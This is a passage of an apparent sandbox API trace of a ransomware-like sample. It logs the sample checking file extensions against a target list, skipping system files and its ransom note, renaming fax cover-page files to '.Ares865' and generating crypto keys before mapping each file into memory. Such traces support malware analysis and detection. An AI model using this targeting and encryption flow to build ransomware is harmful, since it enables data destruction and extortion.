(lpString="jtx") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="jtx") returned -1 [0083.741] lstrlenW (lpString="kdb") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="kdb") returned -1 [0083.741] lstrlenW (lpString="kexi") returned 4 [0083.741] lstrcmpiW (lpString1=".cov", lpString2="kexi") returned -1 [0083.741] lstrlenW (lpString="kexic") returned 5 [0083.741] lstrcmpiW (lpString1="t.cov", lpString2="kexic") returned 1 [0083.741] lstrlenW (lpString="kexis") returned 5 [0083.741] lstrcmpiW (lpString1="t.cov", lpString2="kexis") returned 1 [0083.741] lstrlenW (lpString="lgc") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="lgc") returned -1 [0083.741] lstrlenW (lpString="lwx") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="lwx") returned -1 [0083.741] lstrlenW (lpString="maf") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="maf") returned -1 [0083.741] lstrlenW (lpString="maq") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="maq") returned -1 [0083.742] lstrlenW (lpString="mar") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="mar") returned -1 [0083.742] lstrlenW (lpString="marshal") returned 7 [0083.742] lstrcmpiW (lpString1="ent.cov", lpString2="marshal") returned -1 [0083.742] lstrlenW (lpString="mas") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="mas") returned -1 [0083.742] lstrlenW (lpString="mav") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="mav") returned -1 [0083.742] lstrlenW (lpString="maw") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="maw") returned -1 [0083.742] lstrlenW (lpString="mdbhtml") returned 7 [0083.742] lstrcmpiW (lpString1="ent.cov", lpString2="mdbhtml") returned -1 [0083.742] lstrlenW (lpString="mdn") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="mdn") returned -1 [0083.742] lstrlenW (lpString="mdt") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="mdt") returned -1 [0083.742] lstrlenW (lpString="mfd") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="mfd") returned -1 [0083.742] lstrlenW (lpString="mpd") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="mpd") returned -1 [0083.742] lstrlenW (lpString="mrg") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="mrg") returned -1 [0083.742] lstrlenW (lpString="mud") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="mud") returned -1 [0083.742] lstrlenW (lpString="mwb") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="mwb") returned -1 [0083.742] lstrlenW (lpString="myd") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="myd") returned -1 [0083.742] lstrlenW (lpString="ndf") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="ndf") returned -1 [0083.742] lstrlenW (lpString="nnt") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="nnt") returned -1 [0083.742] lstrlenW (lpString="nrmlib") returned 6 [0083.742] lstrcmpiW (lpString1="nt.cov", lpString2="nrmlib") returned 1 [0083.742] lstrlenW (lpString="ns2") returned 3 [0083.742] lstrcmpiW (lpString1="cov", lpString2="ns2") returned -1 [0083.742] lstrlenW (lpString="ns3") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="ns3") returned -1 [0083.743] lstrlenW (lpString="ns4") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="ns4") returned -1 [0083.743] lstrlenW (lpString="nsf") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="nsf") returned -1 [0083.743] lstrlenW (lpString="nv") returned 2 [0083.743] lstrcmpiW (lpString1="ov", lpString2="nv") returned 1 [0083.743] lstrlenW (lpString="nv2") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="nv2") returned -1 [0083.743] lstrlenW (lpString="nwdb") returned 4 [0083.743] lstrcmpiW (lpString1=".cov", lpString2="nwdb") returned -1 [0083.743] lstrlenW (lpString="nyf") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="nyf") returned -1 [0083.743] lstrlenW (lpString="odb") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="odb") returned -1 [0083.743] lstrlenW (lpString="odb") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="odb") returned -1 [0083.743] lstrlenW (lpString="oqy") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="oqy") returned -1 [0083.743] lstrlenW (lpString="ora") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="ora") returned -1 [0083.743] lstrlenW (lpString="orx") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="orx") returned -1 [0083.743] lstrlenW (lpString="owc") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="owc") returned -1 [0083.743] lstrlenW (lpString="p96") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="p96") returned -1 [0083.743] lstrlenW (lpString="p97") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="p97") returned -1 [0083.743] lstrlenW (lpString="pan") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="pan") returned -1 [0083.743] lstrlenW (lpString="pdb") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="pdb") returned -1 [0083.743] lstrlenW (lpString="pdm") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="pdm") returned -1 [0083.743] lstrlenW (lpString="pnz") returned 3 [0083.743] lstrcmpiW (lpString1="cov", lpString2="pnz") returned -1 [0083.743] lstrlenW (lpString="qry") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="qry") returned -1 [0083.744] lstrlenW (lpString="qvd") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="qvd") returned -1 [0083.744] lstrlenW (lpString="rbf") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="rbf") returned -1 [0083.744] lstrlenW (lpString="rctd") returned 4 [0083.744] lstrcmpiW (lpString1=".cov", lpString2="rctd") returned -1 [0083.744] lstrlenW (lpString="rod") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="rod") returned -1 [0083.744] lstrlenW (lpString="rodx") returned 4 [0083.744] lstrcmpiW (lpString1=".cov", lpString2="rodx") returned -1 [0083.744] lstrlenW (lpString="rpd") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="rpd") returned -1 [0083.744] lstrlenW (lpString="rsd") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="rsd") returned -1 [0083.744] lstrlenW (lpString="sas7bdat") returned 8 [0083.744] lstrcmpiW (lpString1="dent.cov", lpString2="sas7bdat") returned -1 [0083.744] lstrlenW (lpString="sbf") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="sbf") returned -1 [0083.744] lstrlenW (lpString="scx") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="scx") returned -1 [0083.744] lstrlenW (lpString="sdb") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="sdb") returned -1 [0083.744] lstrlenW (lpString="sdc") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="sdc") returned -1 [0083.744] lstrlenW (lpString="sdf") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="sdf") returned -1 [0083.744] lstrlenW (lpString="sis") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="sis") returned -1 [0083.744] lstrlenW (lpString="spq") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="spq") returned -1 [0083.744] lstrlenW (lpString="te") returned 2 [0083.744] lstrcmpiW (lpString1="ov", lpString2="te") returned -1 [0083.744] lstrlenW (lpString="teacher") returned 7 [0083.744] lstrcmpiW (lpString1="ent.cov", lpString2="teacher") returned -1 [0083.744] lstrlenW (lpString="tmd") returned 3 [0083.744] lstrcmpiW (lpString1="cov", lpString2="tmd") returned -1 [0083.745] lstrlenW (lpString="tps") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="tps") returned -1 [0083.745] lstrlenW (lpString="trc") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="trc") returned -1 [0083.745] lstrlenW (lpString="trc") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="trc") returned -1 [0083.745] lstrlenW (lpString="trm") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="trm") returned -1 [0083.745] lstrlenW (lpString="udb") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="udb") returned -1 [0083.745] lstrlenW (lpString="udl") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="udl") returned -1 [0083.745] lstrlenW (lpString="usr") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="usr") returned -1 [0083.745] lstrlenW (lpString="v12") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="v12") returned -1 [0083.745] lstrlenW (lpString="vis") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="vis") returned -1 [0083.745] lstrlenW (lpString="vpd") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="vpd") returned -1 [0083.745] lstrlenW (lpString="vvv") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="vvv") returned -1 [0083.745] lstrlenW (lpString="wdb") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="wdb") returned -1 [0083.745] lstrlenW (lpString="wmdb") returned 4 [0083.745] lstrcmpiW (lpString1=".cov", lpString2="wmdb") returned -1 [0083.745] lstrlenW (lpString="wrk") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="wrk") returned -1 [0083.745] lstrlenW (lpString="xdb") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="xdb") returned -1 [0083.745] lstrlenW (lpString="xld") returned 3 [0083.745] lstrcmpiW (lpString1="cov", lpString2="xld") returned -1 [0083.745] lstrlenW (lpString="xmlff") returned 5 [0083.745] lstrcmpiW (lpString1="t.cov", lpString2="xmlff") returned -1 [0083.745] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov.Ares865") returned 91 [0083.745] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov.ares865"), dwFlags=0x1) returned 1 [0083.749] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.750] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10410) returned 1 [0083.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0083.750] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0083.751] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.751] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.751] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2bb0, lpName=0x0) returned 0x15c [0083.753] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2bb0) returned 0x190000 [0083.754] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0083.755] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.755] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2="aoldtz.exe") returned 1 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2=".") returned 1 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2="..") returned 1 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2="windows") returned -1 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2="bootmgr") returned 1 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2="temp") returned -1 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2="pagefile.sys") returned -1 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2="boot") returned 1 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2="ids.txt") returned -1 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2="ntuser.dat") returned -1 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2="perflogs") returned -1 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2="MSBuild") returned -1 [0083.756] lstrlenW (lpString="fyi.cov") returned 7 [0083.756] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov") returned 83 [0083.756] lstrcpyW (in: lpString1=0x2cce48c, lpString2="fyi.cov" | out: lpString1="fyi.cov") returned="fyi.cov" [0083.756] lstrlenW (lpString="fyi.cov") returned 7 [0083.756] lstrlenW (lpString="Ares865") returned 7 [0083.756] lstrlenW (lpString=".dll") returned 4 [0083.756] lstrcmpiW (lpString1="fyi.cov", lpString2=".dll") returned 1 [0083.757] lstrlenW (lpString=".lnk") returned 4 [0083.757] lstrcmpiW (lpString1="fyi.cov", lpString2=".lnk") returned 1 [0083.757] lstrlenW (lpString=".ini") returned 4 [0083.757] lstrcmpiW (lpString1="fyi.cov", lpString2=".ini") returned 1 [0083.757] lstrlenW (lpString=".sys") returned 4 [0083.757] lstrcmpiW (lpString1="fyi.cov", lpString2=".sys") returned 1 [0083.757] lstrlenW (lpString="fyi.cov") returned 7 [0083.757] lstrlenW (lpString="bak") returned 3 [0083.757] lstrcmpiW (lpString1="cov", lpString2="bak") returned 1 [0083.757] lstrlenW (lpString="ba_") returned 3 [0083.757] lstrcmpiW (lpString1="cov", lpString2="ba_") returned 1 [0083.757] lstrlenW (lpString="dbb") returned 3 [0083.757] lstrcmpiW (lpString1="cov", lpString2="dbb") returned -1 [0083.757] lstrlenW (lpString="vmdk") returned 4 [0083.757] lstrcmpiW (lpString1=".cov", lpString2="vmdk") returned -1 [0083.757] lstrlenW (lpString="rar") returned 3 [0083.757] lstrcmpiW (lpString1="cov", lpString2="rar") returned -1 [0083.757] lstrlenW (lpString="zip") returned 3 [0083.757] lstrcmpiW (lpString1="cov", lpString2="zip") returned -1 [0083.757] lstrlenW (lpString="tgz") returned 3 [0083.757] lstrcmpiW (lpString1="cov", lpString2="tgz") returned -1 [0083.757] lstrlenW (lpString="vbox") returned 4 [0083.757] lstrcmpiW (lpString1=".cov", lpString2="vbox") returned -1 [0083.757] lstrlenW (lpString="vdi") returned 3 [0083.757] lstrcmpiW (lpString1="cov", lpString2="vdi") returned -1 [0083.757] lstrlenW (lpString="vhd") returned 3 [0083.757] lstrcmpiW (lpString1="cov", lpString2="vhd") returned -1 [0083.757] lstrlenW (lpString="vhdx") returned 4 [0083.757] lstrcmpiW (lpString1=".cov", lpString2="vhdx") returned -1 [0083.757] lstrlenW (lpString="avhd") returned 4 [0083.757] lstrcmpiW (lpString1=".cov", lpString2="avhd") returned -1 [0083.757] lstrlenW (lpString="db") returned 2 [0083.757] lstrcmpiW (lpString1="ov", lpString2="db") returned 1 [0083.757] lstrlenW (lpString="db2") returned 3 [0083.757] lstrcmpiW (lpString1="cov", lpString2="db2") returned -1 [0083.757] lstrlenW (lpString="db3") returned 3 [0083.757] lstrcmpiW (lpString1="cov", lpString2="db3") returned -1 [0083.757] lstrlenW (lpString="dbf") returned 3 [0083.758] lstrcmpiW (lpString1="cov", lpString2="dbf") returned -1 [0083.758] lstrlenW (lpString="mdf") returned 3 [0083.758] lstrcmpiW (lpString1="cov", lpString2="mdf") returned -1 [0083.758] lstrlenW (lpString="mdb") returned 3 [0083.758] lstrcmpiW (lpString1="cov", lpString2="mdb") returned -1 [0083.758] lstrlenW (lpString="sql") returned 3 [0083.758] lstrcmpiW (lpString1="cov", lpString2="sql") returned -1 [0083.758] lstrlenW (lpString="sqlite") returned 6 [0083.758] lstrcmpiW (lpString1="yi.cov", lpString2="sqlite") returned 1 [0083.758] lstrlenW (lpString="sqlite3") returned 7 [0083.758] lstrlenW (lpString="sqlitedb") returned 8 [0083.758] lstrlenW (lpString="xml") returned 3 [0083.758] lstrcmpiW (lpString1="cov", lpString2="xml") returned -1 [0083.758] lstrlenW (lpString="$er") returned 3 [0083.758] lstrcmpiW (lpString1="cov", lpString2="$er") returned 1 [0083.758] lstrlenW (lpString="4dd") returned 3 [0083.758] lstrcmpiW (lpString1="cov", lpString2="4dd") returned 1 [0083.758] lstrlenW (lpString="4dl") returned 3 [0083.758] lstrcmpiW (lpString1="cov", lpString2="4dl") returned 1 [0083.758] lstrlenW (lpString="^^^") returned 3 [0083.758] lstrcmpiW (lpString1="cov", lpString2="^^^") returned 1 [0083.758] lstrlenW (lpString="abs") returned 3 [0083.758] lstrcmpiW (lpString1="cov", lpString2="abs") returned 1 [0083.758] lstrlenW (lpString="abx") returned 3 [0083.758] lstrcmpiW (lpString1="cov", lpString2="abx") returned 1 [0083.758] lstrlenW (lpString="accdb") returned 5 [0083.758] lstrcmpiW (lpString1="i.cov", lpString2="accdb") returned 1 [0083.758] lstrlenW (lpString="accdc") returned 5 [0083.758] lstrcmpiW (lpString1="i.cov", lpString2="accdc") returned 1 [0083.758] lstrlenW (lpString="accde") returned 5 [0083.758] lstrcmpiW (lpString1="i.cov", lpString2="accde") returned 1 [0083.758] lstrlenW (lpString="accdr") returned 5 [0083.758] lstrcmpiW (lpString1="i.cov", lpString2="accdr") returned 1 [0083.758] lstrlenW (lpString="accdt") returned 5 [0083.758] lstrcmpiW (lpString1="i.cov", lpString2="accdt") returned 1 [0083.758] lstrlenW (lpString="accdw") returned 5 [0083.758] lstrcmpiW (lpString1="i.cov", lpString2="accdw") returned 1 [0083.759] lstrlenW (lpString="accft") returned 5 [0083.759] lstrcmpiW (lpString1="i.cov", lpString2="accft") returned 1 [0083.759] lstrlenW (lpString="adb") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="adb") returned 1 [0083.759] lstrlenW (lpString="adb") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="adb") returned 1 [0083.759] lstrlenW (lpString="ade") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="ade") returned 1 [0083.759] lstrlenW (lpString="adf") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="adf") returned 1 [0083.759] lstrlenW (lpString="adn") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="adn") returned 1 [0083.759] lstrlenW (lpString="adp") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="adp") returned 1 [0083.759] lstrlenW (lpString="alf") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="alf") returned 1 [0083.759] lstrlenW (lpString="ask") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="ask") returned 1 [0083.759] lstrlenW (lpString="btr") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="btr") returned 1 [0083.759] lstrlenW (lpString="cat") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="cat") returned 1 [0083.759] lstrlenW (lpString="cdb") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="cdb") returned 1 [0083.759] lstrlenW (lpString="ckp") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="ckp") returned 1 [0083.759] lstrlenW (lpString="cma") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="cma") returned 1 [0083.759] lstrlenW (lpString="cpd") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="cpd") returned -1 [0083.759] lstrlenW (lpString="dacpac") returned 6 [0083.759] lstrcmpiW (lpString1="yi.cov", lpString2="dacpac") returned 1 [0083.759] lstrlenW (lpString="dad") returned 3 [0083.759] lstrcmpiW (lpString1="cov", lpString2="dad") returned -1 [0083.759] lstrlenW (lpString="dadiagrams") returned 10 [0083.759] lstrlenW (lpString="daschema") returned 8 [0083.759] lstrlenW (lpString="db-journal") returned 10 [0083.759] lstrlenW (lpString="db-shm") returned 6 [0083.760] lstrcmpiW (lpString1="yi.cov", lpString2="db-shm") returned 1 [0083.760] lstrlenW (lpString="db-wal") returned 6 [0083.760] lstrcmpiW (lpString1="yi.cov", lpString2="db-wal") returned 1 [0083.760] lstrlenW (lpString="dbc") returned 3 [0083.760] lstrcmpiW (lpString1="cov", lpString2="dbc") returned -1 [0083.760] lstrlenW (lpString="dbs") returned 3 [0083.760] lstrcmpiW (lpString1="cov", lpString2="dbs") returned -1 [0083.760] lstrlenW (lpString="dbt") returned 3 [0083.760] lstrcmpiW (lpString1="cov", lpString2="dbt") returned -1 [0083.760] lstrlenW (lpString="dbv") returned 3 [0083.760] lstrcmpiW (lpString1="cov", lpString2="dbv") returned -1 [0083.760] lstrlenW (lpString="dbx") returned 3 [0083.760] lstrcmpiW (lpString1="cov", lpString2="dbx") returned -1 [0083.760] lstrlenW (lpString="dcb") returned 3 [0083.760] lstrcmpiW (lpString1="cov", lpString2="dcb") returned -1 [0083.760] lstrcmpiW (lpString1="cov", lpString2="dct") returned -1 [0083.760] lstrcmpiW (lpString1="cov", lpString2="dcx") returned -1 [0083.760] lstrcmpiW (lpString1="cov", lpString2="ddl") returned -1 [0083.760] lstrcmpiW (lpString1=".cov", lpString2="dlis") returned -1 [0083.760] lstrcmpiW (lpString1="cov", lpString2="dp1") returned -1 [0083.761] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov.Ares865") returned 85 [0083.761] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov.ares865"), dwFlags=0x1) returned 1 [0083.763] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.763] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10761) returned 1 [0083.763] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.763] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.763] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0083.763] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0083.764] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.764] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.764] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2d10, lpName=0x0) returned 0x15c [0083.766] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2d10) returned 0x190000 [0083.767] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0083.768] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.768] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.768] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.768] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov.Ares865") returned 89 [0083.768] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov.ares865"), dwFlags=0x1) returned 1 [0083.769] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov.Ares865" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.769] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15008) returned 1 [0083.769] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.770] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.770] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0083.770] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0083.770] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.770] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.771] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3da0, lpName=0x0) returned 0x15c [0083.772] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3da0) returned 0x190000 [0083.774] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0083.774] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.774] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0083.774] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.775] 